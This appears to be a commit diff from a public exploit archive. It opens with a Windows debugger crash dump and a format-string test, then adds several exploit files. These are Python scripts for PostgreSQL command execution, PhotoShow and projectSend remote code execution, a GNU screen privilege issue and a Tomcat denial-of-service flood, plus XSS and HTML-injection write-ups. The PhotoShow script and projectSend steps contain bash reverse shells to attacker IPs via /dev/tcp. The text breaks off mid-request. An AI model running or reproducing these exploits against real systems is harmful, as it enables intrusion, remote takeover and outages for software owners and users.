0119fa8c 00000000 010188be 01323000 00000000 ntdll!_RtlUserThreadStart+0x1b
STACK_COMMAND: ~0s ; .cxr ; kb
THREAD_SHA1_HASH_MOD_FUNC: 0b8f8316052b30cae637e16edbb425a676500e95
THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 359d5607a5627480201647a1bc659e9d2ac9281f
THREAD_SHA1_HASH_MOD: 2418d74468f3882fef267f455cd32d7651645882
FOLLOWUP_IP:
MSVCR120!_invoke_watson+e [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132]
645046b1 cd29 int 29h
FAULT_INSTR_CODE: 6a5629cd
FAULTING_SOURCE_LINE: f:\dd\vctools\crt\crtw32\misc\invarg.c
FAULTING_SOURCE_FILE: f:\dd\vctools\crt\crtw32\misc\invarg.c
FAULTING_SOURCE_LINE_NUMBER: 132
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: MSVCR120!_invoke_watson+e
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: MSVCR120
IMAGE_NAME: MSVCR120.dll
DEBUG_FLR_IMAGE_TIMESTAMP: 577e0f1e
BUCKET_ID: FAIL_FAST_INVALID_ARG_MSVCR120!_invoke_watson+e
FAILURE_EXCEPTION_CODE: c0000409
FAILURE_IMAGE_NAME: MSVCR120.dll
BUCKET_ID_IMAGE_STR: MSVCR120.dll
FAILURE_MODULE_NAME: MSVCR120
BUCKET_ID_MODULE_STR: MSVCR120
FAILURE_FUNCTION_NAME: _invoke_watson
BUCKET_ID_FUNCTION_STR: _invoke_watson
BUCKET_ID_OFFSET: e
BUCKET_ID_MODTIMEDATESTAMP: 577e0f1e
BUCKET_ID_MODCHECKSUM: f8aef
BUCKET_ID_MODVER_STR: 12.0.40660.0
BUCKET_ID_PREFIX_STR: FAIL_FAST_INVALID_ARG_
FAILURE_PROBLEM_CLASS: FAIL_FAST
FAILURE_SYMBOL_NAME: MSVCR120.dll!_invoke_watson
FAILURE_BUCKET_ID: FAIL_FAST_INVALID_ARG_c0000409_MSVCR120.dll!_invoke_watson
WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/LinkAndShareTransmitter.exe/1.1.0.2/6144495e/MSVCR120.dll/12.0.40660.0/577e0f1e/c0000409/000a46b1.htm?Retriage=1
TARGET_TIME: 2023-01-29T15:09:52.000Z
OSBUILD: 19044
OSSERVICEPACK: 2364
SERVICEPACK_NUMBER: 0
OS_REVISION: 0
OSPLATFORM_TYPE: x86
OSNAME: Windows 10
OSEDITION: Windows 10 WinNt SingleUserTS Personal
USER_LCID: 0
OSBUILD_TIMESTAMP: 2008-01-07 11:33:18
BUILDDATESTAMP_STR: 160101.0800
BUILDLAB_STR: WinBuild
BUILDOSVER_STR: 10.0.19041.2364
ANALYSIS_SESSION_ELAPSED_TIME: 635d
ANALYSIS_SOURCE: UM
FAILURE_ID_HASH_STRING: um:fail_fast_invalid_arg_c0000409_msvcr120.dll!_invoke_watson
FAILURE_ID_HASH: {c9fee478-4ed1-0d2b-ddd7-dca655d9817f}
Followup: MachineOwner
---------
0:000> d MSVCP120
70fb0000 4d 5a 90 00 03 00 00 00-04 00 00 00 ff ff 00 00 MZ..............
70fb0010 b8 00 00 00 00 00 00 00-40 00 00 00 00 00 00 00 ........@.......
70fb0020 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
70fb0030 00 00 00 00 00 00 00 00-00 00 00 00 f8 00 00 00 ................
70fb0040 0e 1f ba 0e 00 b4 09 cd-21 b8 01 4c cd 21 54 68 ........!..L.!Th
70fb0050 69 73 20 70 72 6f 67 72-61 6d 20 63 61 6e 6e 6f is program canno
70fb0060 74 20 62 65 20 72 75 6e-20 69 6e 20 44 4f 53 20 t be run in DOS
70fb0070 6d 6f 64 65 2e 0d 0d 0a-24 00 00 00 00 00 00 00 mode....$.......
0:000> lmvm MSVCR120
Browse full module list
start end module name
64460000 6454e000 MSVCR120 (private pdb symbols) C:\ProgramData\dbg\sym\msvcr120.i386.pdb\4D11E607E50346DDAB0C2C4FFC8716112\msvcr120.i386.pdb
Loaded symbol image file: C:\WINDOWS\SYSTEM32\MSVCR120.dll
Image path: C:\WINDOWS\SysWOW64\MSVCR120.dll
Image name: MSVCR120.dll
Browse all global symbols functions data
Timestamp: Thu Jul 7 10:13:18 2016 (577E0F1E)
CheckSum: 000F8AEF
ImageSize: 000EE000
File version: 12.0.40660.0
Product version: 12.0.40660.0
File flags: 0 (Mask 3F)
File OS: 4 Unknown Win32
File type: 2.0 Dll
File date: 00000000.00000000
Translations: 0409.04b0
CompanyName: Microsoft Corporation
ProductName: Microsoft® Visual Studio® 2013
InternalName: msvcr120.dll
OriginalFilename: msvcr120.dll
ProductVersion: 12.00.40660.0
FileVersion: 12.00.40660.0 built by: VSULDR
FileDescription: Microsoft® C Runtime Library
LegalCopyright: © Microsoft Corporation. All rights reserved.
0:000> x /D /f MSVCR120!getenv
MSVCR120!getenv (char *)
0:000> x /D /f MSVCR120!getenv
64477785 MSVCR120!getenv (char *)
..
0:000> u 64477785
MSVCR120!getenv [f:\dd\vctools\crt\crtw32\misc\getenv.c @ 75]:
64477785 6a0c push 0Ch
64477787 68f0774764 push offset MSVCR120!_CT??_R0?AVbad_caststd+0x66c (644777f0)
6447778c e8ea75ffff call MSVCR120!__SEH_prolog4 (6446ed7b)
64477791 8365e400 and dword ptr [ebp-1Ch],0
64477795 33c0 xor eax,eax
64477797 8b7508 mov esi,dword ptr [ebp+8]
6447779a 85f6 test esi,esi
6447779c 0f95c0 setne al
0:000> r
eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000
eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
MSVCR120!_invoke_watson+0xe:
645046b1 cd29 int 29h
0:000> u 645046b1
MSVCR120!_invoke_watson+0xe [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132]:
645046b1 cd29 int 29h
645046b3 56 push esi
645046b4 6a01 push 1
645046b6 be170400c0 mov esi,0C0000417h
645046bb 56 push esi
645046bc 6a02 push 2
645046be e85efeffff call MSVCR120!_call_reportfault (64504521)
645046c3 56 push esi
0:000> u 64477785
MSVCR120!getenv [f:\dd\vctools\crt\crtw32\misc\getenv.c @ 75]:
64477785 6a0c push 0Ch
64477787 68f0774764 push offset MSVCR120!_CT??_R0?AVbad_caststd+0x66c (644777f0)
6447778c e8ea75ffff call MSVCR120!__SEH_prolog4 (6446ed7b)
64477791 8365e400 and dword ptr [ebp-1Ch],0
64477795 33c0 xor eax,eax
64477797 8b7508 mov esi,dword ptr [ebp+8]
6447779a 85f6 test esi,esi
6447779c 0f95c0 setne al
0:000> g
WARNING: Continuing a non-continuable exception
(4224.59e8): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!)
eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000
eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
MSVCR120!_invoke_watson+0xe:
645046b1 cd29 int 29h
---
C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>set username=%a.%b.%c.%d.%e.%f.%g.%h.%x.AAAAAAAAAAAAAA.%x.BBBAAAAAAAA=%p=AAAAA.%xAAAAA
C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>LinkAndShareTransmitter.exe
C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>02/02/23 17:11:44 : : Internal Error: can not replace file with temp file
02/02/23 17:11:44 : Background launch: User: 0x1.7474b0p-1019.b.
.1897752.3.147818e+267.1445459053534108500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000.000000.1.36157e+267..0.AAAAAAAAAAAAAA.1cf784.BBBAAAAAAAA=7770C59F=AAAAA.47c778AAAAA

30
exploits/java/webapps/51244.py Executable file
View file

@ -0,0 +1,30 @@
# Exploit Title: Liferay Portal 6.2.5 - Insecure Permissions
# Google Dork: -inurl:/html/js/editor/ckeditor/editor/filemanager/browser/
# Date: 2021/05
# Exploit Author: fu2x2000
# Version: Liferay Portal 6.2.5 or later
# CVE : CVE-2021-33990
import requests
import json
print (" Search this on Google #Dork for liferay
-inurl:/html/js/editor/ckeditor/editor/filemanager/browser/")
url ="URL Goes Here
/html/js/editor/ckeditor/editor/filemanager/browser/liferay/frmfolders.html"
req = requests.get(url)
print req
sta = req.status_code
if sta == 200:
print ('Life Vulnerability exists')
cook = url
print cook
inject = "Command=FileUpload&Type=File&CurrentFolder=/"
#cook_inject = cook+inject
#print cook_inject
else:
print ('not found try a another method')
print ("solution restrict access and user groups")

24
exploits/java/webapps/51255.txt Normal file
View file

@ -0,0 +1,24 @@
# Exploit Title: ERPNext 12.29 - Cross-Site Scripting (XSS)
# Date: 7 Feb 2023
# Exploit Author: Patrick Dean Ramos / Nathu Nandwani / Junnair Manla
#Github - https://github.com/patrickdeanramos/CVE-2022-28598
# Vendor Homepage: https://erpnext.com/
# Version: 12.29
# CVE-2022-28598
Summary: Stored cross-site scripting (XSS) vulnerability was found in ERPNext 12.29 where the
"last_known_version" field found in the "My Setting" page in ERPNext
12.29.0 allows remote attackers to inject arbitrary web script or HTML via
a crafted site name by doing an authenticated POST HTTP request to
'/desk#Form/User/(Authenticated User)' and inject the script in the
'last_known_version' field where we are able to view the script by
clicking the 'pdf' view form.
This vulnerability is specifically the "last_known_version" field found
under the 'My Settings' where we need to first save the my settings.
1. Login as any user
2. Under the last_known_version field we are going to inject our
malicious script.
3. To view our injected script we need to click the view pdf page, and as
seen below we have successfully injected our script.

105
exploits/linux/local/51252.py Executable file
View file

@ -0,0 +1,105 @@
# Exploit Title: GNU screen v4.9.0 - Privilege Escalation
# Date: 03.02.2023
# Exploit Author: Manuel Andreas
# Vendor Homepage: https://www.gnu.org/software/screen/
# Software Link: https://ftp.gnu.org/gnu/screen/screen-4.9.0.tar.gz
# Version: 4.9.0
# Tested on: Arch Linux
# CVE : CVE-2023-24626
import os
import socket
import struct
import argparse
import subprocess
import pty
import time
SOCKDIR_TEMPLATE = "/run/screens/S-{}"
MAXPATHLEN = 4096
MAXTERMLEN = 32
MAXLOGINLEN = 256
STRUCTSIZE = 12584
MSG_QUERY = 9
def find_latest_socket(dir):
return f"{dir}/{sorted(os.listdir(dir))[-1]}"
def build_magic(ver=5):
return ord('m') << 24 | ord('s') << 16 | ord('g') << 8 | ver
def build_msg(type):
return struct.pack("<ii", build_magic(), type) + MAXPATHLEN * b"T"
def build_query(auser, nargs, cmd, apid, preselect, writeback):
assert(len(auser) == MAXLOGINLEN + 1)
assert(len(cmd) == MAXPATHLEN)
assert(len(preselect) == 20)
assert(len(writeback) == MAXPATHLEN)
buf = build_msg(MSG_QUERY)
buf += auser
buf += 3 * b"\x00" #Padding
buf += struct.pack("<i", nargs)
buf += cmd
buf += struct.pack("<i", apid)
buf += preselect
buf += writeback
# Union padding
buf += (STRUCTSIZE - len(buf)) * b"P"
return buf
def spawn_screen_instance():
# provide a pty
mo, so = pty.openpty()
me, se = pty.openpty()
mi, si = pty.openpty()
screen = subprocess.Popen("/usr/bin/screen", bufsize=0, stdin=si, stdout=so, stderr=se, close_fds=True, env={"TERM":"xterm"})
for fd in [so, se, si]:
os.close(fd)
return screen
def main():
parser = argparse.ArgumentParser(description='PoC for sending SIGHUP as root utilizing GNU screen configured as setuid root.')
parser.add_argument('pid', type=int, help='the pid to receive the signal')
args = parser.parse_args()
pid = args.pid
username = os.getlogin()
screen = spawn_screen_instance()
print("Waiting a second for screen to setup its socket..")
time.sleep(1)
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
socket_path = find_latest_socket(SOCKDIR_TEMPLATE.format(username))
print(f"Connecting to: {socket_path}")
s.connect(socket_path)
print('Sending message...')
msg = build_query(username.encode('ascii') + (MAXLOGINLEN + 1 - len(username)) * b"\x00", 0, MAXPATHLEN * b"E", pid, 20 * b"\x00", MAXPATHLEN * b"D")
s.sendmsg([msg])
s.recv(512)
print(f'Ok sent SIGHUP to {pid}!')
screen.kill()
if __name__ == '__main__':
main()

55
exploits/multiple/dos/51262.py Executable file
View file

@ -0,0 +1,55 @@
# Exploit Title: Apache Tomcat 10.1 - Denial Of Service
# Google Dork: N/A
# Date: 13/07/2022
# Exploit Author: Cristian 'void' Giustini
# Vendor Homepage: https://tomcat.apache.org/
# Software Link: https://tomcat.apache.org/download-10.cgi
# Version: <= 10.1
# Tested on: Apache Tomcat 10.0 (Docker)
# CVE : CVE-2022-29885 (CVE Owner: 4ra1n)
# Exploit pre-requirements: pip install pwntools==4.8.0
# Analysis : https://voidzone.me/cve-2022-29885-apache-tomcat-cluster-service-dos/
#!/usr/bin/env python3
# coding: utf-8
from pwn import *
import time
import threading
import subprocess
threads = []
def send_payload():
r = remote("localhost", 4000)
while True:
r.send(b"FLT2002" + b"A" * 10000)
for _ in range(5):
new_thread = threading.Thread(target=send_payload)
threads.append(new_thread)
new_thread.start()
for old_thread in threads:
old_thread.join()

104
exploits/multiple/remote/51247.py Executable file
View file

@ -0,0 +1,104 @@
# Exploit Title: PostgreSQL 9.6.1 - Remote Code Execution (RCE) (Authenticated)
# Date: 2023-02-01
# Exploit Author: Paulo Trindade (@paulotrindadec), Bruno Stabelini (@Bruno Stabelini), Diego Farias (@fulcrum) and Weslley Shaimon
# Github: https://github.com/paulotrindadec/CVE-2019-9193
# Version: PostgreSQL 9.6.1 on x86_64-pc-linux-gnu
# Tested on: Red Hat Enterprise Linux Server 7.9
# CVE: CVE-20199193
#!/usr/bin/python3
import sys
import psycopg2
import argparse
def parseArgs():
parser = argparse.ArgumentParser(description='PostgreSQL 9.6.1 Authenticated Remote Code Execution')
parser.add_argument('-i', '--ip', nargs='?', type=str, default='127.0.0.1', help='The IP address of the PostgreSQL DB [Default: 127.0.0.1]')
parser.add_argument('-p', '--port', nargs='?', type=int, default=5432, help='The port of the PostgreSQL DB [Default: 5432]')
parser.add_argument('-U', '--user', nargs='?', default='postgres', help='Username to connect to the PostgreSQL DB [Default: postgres]')
parser.add_argument('-P', '--password', nargs='?', default='postgres', help='Password to connect to the the PostgreSQL DB [Default: postgres]')
parser.add_argument('-c', '--command', nargs='?', help='System command to run')
args = parser.parse_args()
return args
def main():
try:
# Variables
RHOST = args.ip
RPORT = args.port
USER = args.user
PASS = args.password
print(f"\r\n[+] Connect to PostgreSQL - {RHOST}")
con = psycopg2.connect(host=RHOST, port=RPORT, user=USER, password=PASS)
if (args.command):
exploit(con)
else:
print ("[!] Add argument -c [COMMAND] to execute system commands")
except psycopg2.OperationalError as e:
print("Error")
print ("\r\n[-] Failed to connect with PostgreSQL")
exit()
def exploit(con):
cur = con.cursor()
CMD = args.command
try:
print('[*] Running\n')
cur.execute("DROP TABLE IF EXISTS triggeroffsec;")
cur.execute("DROP FUNCTION triggeroffsecexeccmd() cascade;")
cur.execute("DROP TABLE IF EXISTS triggeroffsecsource;")
cur.execute("DROP TRIGGER IF EXISTS shoottriggeroffsecexeccmd on triggeroffsecsource;")
cur.execute("CREATE TABLE triggeroffsec (id serial PRIMARY KEY, cmdout text);")
cur.execute("""CREATE OR REPLACE FUNCTION triggeroffsecexeccmd()
RETURNS TRIGGER
LANGUAGE plpgsql
AS $BODY$
BEGIN
COPY triggeroffsec (cmdout) FROM PROGRAM %s;
RETURN NULL;
END;
$BODY$;
""",[CMD,]
)
cur.execute("CREATE TABLE triggeroffsecsource(s_id integer PRIMARY KEY);")
cur.execute("""CREATE TRIGGER shoottriggeroffsecexeccmd
AFTER INSERT
ON triggeroffsecsource
FOR EACH STATEMENT
EXECUTE PROCEDURE triggeroffsecexeccmd();
""")
cur.execute("INSERT INTO triggeroffsecsource VALUES (2);")
cur.execute("TABLE triggeroffsec;")
con.commit()
returncmd = cur.fetchall()
for result in returncmd:
print(result)
except (Exception, psycopg2.DatabaseError) as error:
print(error)
finally:
if con is not None:
con.close()
#print("Closed connection")
if __name__ == "__main__":
args = parseArgs()
main()

189
exploits/multiple/webapps/51237.txt Normal file
View file

@ -0,0 +1,189 @@
Exploit Title: Secure Web Gateway 10.2.11 - Cross-Site Scripting (XSS)
Product: Secure Web Gateway
Affected Versions: 10.2.11, potentially other versions
Fixed Versions: 10.2.17, 11.2.6, 12.0.1
Vulnerability Type: Cross-Site Scripting
Security Risk: high
Vendor URL: https://www.skyhighsecurity.com/en-us/products/secure-web-gateway.html
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2022-002
Advisory Status: published
CVE: CVE-2023-0214
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0214
Introduction
============
"Skyhigh Security Secure Web Gateway (SWG) is the intelligent,
cloud-native web security solution that connects and secures your
workforce from malicious websites and cloud apps—from anywhere, any
application, and any device."
(from the vendor's homepage)
More Details
============
The Secure Web Gateway's (SWG) block page, which is displayed when a
request or response is blocked by a rule, can contain static files such
as images, stylesheets or JavaScript code. These files are embedded
using special URL paths. Consider the following excerpt of a block page:
------------------------------------------------------------------------
<html>
<!-- FileName: index.html
Language: [en]
-->
<!--Head-->
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type">
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<title>McAfee Web Gateway - Notification</title>
<script src="/mwg-internal/de5fs23hu73ds/files/javascript/sw.js" type="text/javascript" ></script>
<link rel="stylesheet" href="/mwg-internal/de5fs23hu73ds/files/default/stylesheet.css" />
</head>
------------------------------------------------------------------------
Static content is loaded from URL paths prefixed with
"/mwg-internal/de5fs23hu73ds/". It was discovered that paths with this
prefix are intercepted and directly handled by the SWG no matter on
which domain they are accessed. While the prefix can be configured in
the SWG, attackers can also obtain it using another currently
undisclosed vulnerability.
By reverse engineering the file "libSsos.so" and analysing JavaScript
code, it was possible to derive the API of the "Ssos" plugin's
"SetLoginToken" action. Through the following call using the
command-line HTTP client curl, the behaviour of the plugin was further
analysed:
------------------------------------------------------------------------
$ curl --proxy http://192.168.1.1:8080 -i 'https://gateway.example.com/mwg-internal/de5fs23hu73ds/plugin?target=Ssos&action=SetLoginToken&v=v&c=c&p=p'
HTTP/1.0 200 OK
P3P: p
Connection: Keep-Alive
Set-Cookie: MwgSso=v; Path=/; Max-Age=240;
Content-Type: application/javascript
Content-Length: 2
X-Frame-Options: deny
c;
------------------------------------------------------------------------
The response embeds the values of the three URL parameters "v", "c" and
"p". The value for "p" is embedded as value of the "P3P" header, the
value of "c" as the response body and the value of "v" as the value
of the cookie "MwgSso".
It is also possible to include newline or carriage return characters in
the parameter value which are not encoded in the output. Consequently,
if the value of the parameter "p" contains a line break, arbitrary
headers can be injected. If two line breaks follow, an arbitrary body
can be injected. If a suitable "Content-Length" header is injected, the
remaining headers and body of the original response will be ignored by
the browser. This means that apart from the initial "P3P" header, an
arbitrary response can be generated. For example, a page containing
JavaScript code could be returned, resulting in a cross-site scripting
attack.
Consequently, attackers can construct URL paths that can be appended to
any domain and cause an arbitrary response to be returned if the URL is
accessed through the SWG. This could be exploited by distributing such
URLs or even by offering a website which performs an automatic redirect
to any other website using such a URL. As a result, the SWG exposes its
users to self-induced cross-site scripting vulnerabilities in any
website.
Proof of Concept
================
In the following request, the "p" parameter is used to inject suitable
"Content-Type" and "Content-Length" headers, as well as an arbitrary
HTML response body.
------------------------------------------------------------------------
$ curl --proxy http://192.168.1.1:8080 'https://gateway.example.com/mwg-internal/de5fs23hu73ds/plugin?target=Ssos&action=SetLoginToken&v=v&c=c&p=p%0aContent-Type: text/html%0aContent-Length: 27%0a%0a<h1>RedTeam Pentesting</h1>'
HTTP/1.0 200 OK
P3P: p
Content-Type: text/html
Content-Length: 27
<h1>RedTeam Pentesting</h1>
------------------------------------------------------------------------
As mentioned above, the HTTP response body could also include JavaScript
code designed to interact with the domain specified in the URL resulting
in a cross-site scripting vulnerability.
Workaround
==========
None.
Fix
===
According to the vendor, the vulnerability is mitigated in versions
10.2.17, 11.2.6 and 12.0.1 of the Secure Web Gateway. This was not
verified by RedTeam Pentesting GmbH. The vendor's security bulletin can
be found at the following URL:
https://kcm.trellix.com/corporate/index?page=content&id=SB10393
Security Risk
=============
The vulnerability could be used to perform cross-site scripting attacks
against users of the SWG in context of any domain. Attackers only need
to convince users to open a prepared URL or visit an attacker's website
that could perform an automatic redirect to an exploit URL. This exposes
any website visited through the SWG to the various risks and
consequences of a cross-site scripting vulnerability such as account
takeover. As a result, this vulnerability poses a high risk.
Timeline
========
2022-07-29 Vulnerability identified
2022-10-20 Customer approved disclosure to vendor
2022-10-20 Vulnerability was disclosed to the vendor
2023-01-17 Patch released by vendor for versions 10.2.17, 11.2.6 and
12.0.1.
2023-01-26 Detailed advisory released by RedTeam Pentesting GmbH
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
=============================
RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://jobs.redteam-pentesting.de/
--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Alter Posthof 1 Fax : +49 241 510081-99
52062 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen

29
exploits/multiple/webapps/51254.txt Normal file
View file

@ -0,0 +1,29 @@
# Exploit Title: BTCPay Server v1.7.4 - HTML Injection
# Date: 01/26/2023
# Exploit Author: Manojkumar J (TheWhiteEvil)
# Vendor Homepage: https://github.com/btcpayserver/btcpayserver
# Software Link:
https://github.com/btcpayserver/btcpayserver/releases/tag/v1.7.5
# Version: <=1.7.4
# Tested on: Windows10
# CVE : CVE-2023-0493
# Description:
BTCPay Server v1.7.4 HTML injection vulnerability.
# Steps to exploit:
1. Create an account on the target website.
Register endpoint: https://target-website.com/register#
2. Move on to the API key and create API key with the html injection in the
label field.
Example:
<a href="https://hackerbro.in">clickhere</a>
3. Click remove/delete API key, the html injection will render.

9
exploits/multiple/webapps/51264.txt Normal file
View file

@ -0,0 +1,9 @@
# Exploit Title: Provide Server v.14.4 XSS - CSRF & Remote Code Execution (RCE)
# Date: 2023-02-10
# Exploit Author: Andreas Finstad
# Version: < 14.4.1.29
# Tested on: Windows Server 2022
# CVE : CVE-2023-23286
POC:
https://f20.be/blog/provide-server-14-4

39
exploits/php/dos/51256.txt Normal file
View file

@ -0,0 +1,39 @@
## Exploit Title: ImageMagick 7.1.0-49 - DoS
## Author: nu11secur1ty
## Date: 02.07.2023
## Vendor: https://imagemagick.org/
## Software: https://imagemagick.en.uptodown.com/windows/download/82953605
## Reference: https://portswigger.net/daily-swig/denial-of-service
## CVE-ID: CVE-2022-44267
## Description:
ImageMagick 7.1.0-49 is vulnerable to Denial of Service.
When it parses a PNG image (e.g., for resize), the convert process
could be left waiting for stdin input.
The attacker can easily send a malicious png file to the victim and
then when the victim has opened this png he will crash the program.
STATUS: HIGH Vulnerability
[+]Payload:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-44267/PoC)
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-44267)
## Proof and Exploit:
[href](https://streamable.com/l7z79c)
## Time spend:
00:30:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

93
exploits/php/webapps/51236.py Executable file
View file

@ -0,0 +1,93 @@
# Exploit Title: PhotoShow 3.0 - Remote Code Execution
# Date: January 11, 2023
# Exploit Author: LSCP Responsible Disclosure Lab
# Detailed Bug Description: https://lscp.llc/index.php/2021/07/19/how-white-box-hacking-works-remote-code-execution-and-stored-xss-in-photoshow-3-0/
# Vendor Homepage: https://github.com/thibaud-rohmer
# Software Link: https://github.com/thibaud-rohmer/PhotoShow
# Version: 3.0
# Tested on: Ubuntu 20.04 LTS
# creds of a user with admin privileges required
import sys
import requests
import base64
import urllib.parse
if(len(sys.argv)!=6):
print('Usage: \n\tpython3 ' + sys.argv[0] + ' "login" ' +
'"password" "target_ip" "attacker_ip" "attacker_nc_port"')
quit()
login=sys.argv[1]
password=sys.argv[2]
targetIp = sys.argv[3]
attackerIp = sys.argv[4]
attackerNcPort = sys.argv[5]
def main():
session = requests.Session()
#login as admin user
logInSession(session, targetIp, login, password)
#change application behaviour for handling .mp4 video
uploadExpoit(session, targetIp, attackerIp, attackerNcPort)
#send the shell to attaker's nc by uploading .mp4 video
sendMP4Video(session, targetIp)
print("Check your netcat")
def logInSession(session, targetIp, login, password):
session.headers.update({'Content-Type' : "application/x-www-form-urlencoded"})
data = "login="+login+"&password="+password
url = "http://"+targetIp+"/?t=Login"
response= session.post(url, data=data)
phpsessid=response.headers.get("Set-Cookie").split(";")[0]
session.headers.update({'Cookie' : phpsessid})
def uploadExpoit(session, targetIp, attackerIp, attackerNcPort):
exiftranPathInjection=createInjection(attackerIp, attackerNcPort)
url = "http://"+targetIp+"/?t=Adm&a=Set"
data = "name=PhotoShow&site_address=&loc=default.ini&user_theme=Default&" \
+ "rss=on&max_comments=50&thumbs_size=200&fbappid=&ffmpeg_path=&encode_video=on&"\
+ "ffmpeg_option=-threads+4+-vcodec+libx264+-acodec+libfdk_aac&rotate_image=on&"\
+ exiftranPathInjection
session.post(url, data=data).content.decode('utf8')
def createInjection(attakerIp, attackerNcPort):
textToEncode = "bash -i >& /dev/tcp/"+attackerIp+"/"+attackerNcPort+" 0>&1"
b64Encoded = base64.b64encode(textToEncode.encode("ascii"))
strb64 = str(b64Encoded)
strb64 = strb64[2:len(strb64)-1]
injection = {"exiftran_path":"echo "+ strb64 +" | base64 -d > /tmp/1.sh ;/bin/bash /tmp/1.sh"}
return urllib.parse.urlencode(injection)
def sendMP4Video(session, targetIp):
session.headers.update({'Content-Type' : "multipart/form-data; "\
+"boundary=---------------------------752343701418612422363028651"})
url = "http://"+targetIp+"/?a=Upl"
data = """-----------------------------752343701418612422363028651\r
Content-Disposition: form-data; name="path"\r
\r
\r
-----------------------------752343701418612422363028651\r
Content-Disposition: form-data; name="inherit"\r
\r
1\r
-----------------------------752343701418612422363028651\r
Content-Disposition: form-data; name="images[]"; filename="a.mp4"\r
Content-Type: video/mp4\r
\r
a\r
-----------------------------752343701418612422363028651--\r
"""
try:
session.post(url, data=data, timeout=0.001)
except requests.exceptions.ReadTimeout:
pass
if __name__ =="__main__":
main()

132
exploits/php/webapps/51238.txt Normal file
View file

@ -0,0 +1,132 @@
Exploit Title: projectSend r1605 - Remote Code Exectution RCE
Application: projectSend
Version: r1605
Bugs: rce via file extension manipulation
Technology: PHP
Vendor URL: https://www.projectsend.org/
Software Link: https://www.projectsend.org/
Date of found: 26-01-2023
Author: Mirabbas Ağalarov
Tested on: Linux
POC video: https://youtu.be/Ln7KluDfnk4
2. Technical Details & POC
========================================
1.The attacker first creates a txt file and pastes the following code. Next, the Attacker changes the file extension to jpg. Because the system php,sh,exe etc. It does not allow files.
bash -i >& /dev/tcp/192.168.100.18/4444 0>&1
2.Then the attacker starts listening for ip and port
nc -lvp 4444
3.and when uploading file it makes http request as below.file name should be like this openme.sh;jpg
POST /includes/upload.process.php HTTP/1.1
Host: localhost
Content-Length: 525
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-platform: "Linux"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0enbZuQQAtahFVjI
Accept: */*
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/upload.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59
Connection: close
------WebKitFormBoundary0enbZuQQAtahFVjI
Content-Disposition: form-data; name="name"
openme.sh;jpg
------WebKitFormBoundary0enbZuQQAtahFVjI
Content-Disposition: form-data; name="chunk"
0
------WebKitFormBoundary0enbZuQQAtahFVjI
Content-Disposition: form-data; name="chunks"
1
------WebKitFormBoundary0enbZuQQAtahFVjI
Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: application/octet-stream
bash -i >& /dev/tcp/192.168.100.18/4444 0>&1
------WebKitFormBoundary0enbZuQQAtahFVjI--
4.In the second request, we do this to the filename section at the bottom.
openme.sh
POST /files-edit.php?ids=34 HTTP/1.1
Host: localhost
Content-Length: 1016
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryc8btjvyb3An7HcmA
